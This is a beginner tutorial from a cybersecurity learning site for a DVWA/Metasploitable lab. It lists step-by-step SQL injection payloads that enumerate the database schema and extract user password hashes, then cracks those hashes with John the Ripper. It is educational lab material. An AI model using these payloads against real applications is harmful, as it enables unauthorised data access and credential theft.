SQL Injection Lab Part 1 – Lab Setup

September 6, 2016 | Views: 6662

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

Hello Cybrarians ! ! !

Welcome to: SQL injection lab PT.1 – Intro/Lab setup

In this lab, We’ll begin the series of SQL Injection. This will be Part-Wise Article/Guide to learn SQL Injection.

*Skill/Experience : Before proceeding to this series, you must know basics on setting up VM environments.

  • Let’s start from LAB setup (This part explains how we will perform this lab, and what will we deal with).
    > Kali Linux (or BT 5r3) VM and Metasploitable VM in NAT mode. (You must knw this)
    > Check IP address of both devices.

Step-by-step instruction

  1. Open Kali Linux (or BT 5r3)
  2. Open your browser and type http://IP address of Metasploitable/dvwa/login.php
  3. Login with user name “admin” and password “password”
  4. Click on DVWA Security and set it to low then submit
  5. Click on manual SQL injection
  6. On User ID box type 1 and Submit (Php select statement: $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘$id’”;)
  7.  %’ or ‘0’=’0 (mysql> SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or ‘0’=’0′;)
  8.  Get DB version: %’ or 0=0 union select null, version() #
  9. Get DB user: %’ or 0=0 union select null, user() #
  10. Get DB name: %’ or 0=0 union select null, database() #
  11.  Get Schima information: %’ and 1=0 union select null, table_name from information_schema.tables #
  12. Get user table in Schema information: %’ and 1=0 union select null, table_name from information_schema.tables where table_name like ‘user%’#
  13. Get all the columns fields in the information_schema user table: %’ and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = ‘users’ #
  14. Let’s get password authentication hash: %’ and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
  15. Now copy all the hash file in a notepad as below format E.g. user:password
  16. Save it to /pentest/passwords/john by name dvwa_password.txt
  17. Open a console and go to /pentest/passwords/john
  18. cd /pentest/passwords/john
  19. now lunch john the ripper ./john –format=raw-MD5 dvwa_password.txt and hit enter.

(You will get the passwords)

….Ok Cybrarians, we’ll continue this in the next part.

By : Bijay Acharya  |  Follow me in twitter : @acharya_bijay   | Subscribe my tutorial channel for ethical hacking videos (in nepali language) here > > Student Video Tutorial 

Share with Friends
Use Cybytes and
Tip the Author!
Share with Friends
Ready to share your knowledge and expertise?
  1. that’s good job thank’s Bro

  2. Amazing. Will try it out. Great job.

Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge


We recommend always using caution when following any link

Are you sure you want to continue?